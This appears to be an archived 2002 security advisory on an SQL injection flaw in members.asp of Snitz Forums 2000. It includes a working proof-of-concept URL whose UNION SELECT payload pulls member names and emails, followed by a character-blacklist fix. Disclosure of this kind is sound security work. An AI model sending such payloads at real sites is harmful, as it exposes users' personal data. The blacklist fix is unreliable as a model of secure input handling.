('binary' encoding is not supported, stored as-is) vulnerable ---------- Product : Snitz Forums 2000 Version : 3.3 3.3.01 3.3.02 3.3.03 (last stable version) Object : members.asp Class : Input validation error (remote SQL query manipulation vulnerability) Vendor-URL : http://forum.snitz.com/ Vendor-Status : informed, not patched Remote-Exploit : yes Introduction ------------ Snitz Forums 2000 is open source ASP-based web forum software. It runs on Microsoft Windows operating systems. A vulnerability exists in Snitz Forums 2000 which makes it possible for a malicious user to remotely manipulate the logic of SQL queries. As a result, it may be possible for attackers to view all data in the forum's database. This vulnerability can be exploited with a web browser. More Details ------------ In members.asp page, when listing the members with a criteria, the input (M_NAME) is not checked for malicious code. As a result, an attacker can add extra SELECT statement to the query with UNION and he/she can view any data in the forum's database. Proof-of-concept ---------------- Normally, to view the members' list whose membername start with 'A', members.asp page is used as the following: /members.asp? mode=search&M_NAME=A&initial=1&method= Use this link to view the vulnerability: /members.asp?mode=search&M_NAME=XXXX% 25')%20UNION%20SELECT%20MEMBER_ID,% 20M_STATUS,%20M_NAME%20%2B%20'/'%20% 2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,% 20M_EMAIL,%20M_COUNTRY,% 20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,% 20M_AIM,%20M_TITLE,%20M_POSTS,% 20M_LASTPOSTDATE,%20M_LASTHEREDATE,% 20M_DATE,%20M_STATE%20FROM% 20FORUM_MEMBERS%20WHERE%20(M_NAME% 20LIKE%20'&initial=1&method= MEMBERNAME column will be MEMBERNAME/EMAIL/ column. Temporary fix ------------- To fix this bug, in members.asp , change the following lines : SearchName = Request("M_NAME") if SearchName = "" then SearchName = Request.Form("M_NAME") end if with : if IsValidString(Request("M_NAME")) then SearchName = Request("M_NAME") end if if SearchName = "" then if IsValidString(Request.Form("M_NAME")) then SearchName = Request.Form("M_NAME") end if end if and in function IsValidString(sValidate) in inc_functions.asp , change the following line: sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<" with : sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"
This archive was generated by hypermail 2b30 : Fri Apr 19 2002 - 16:21:12 PDT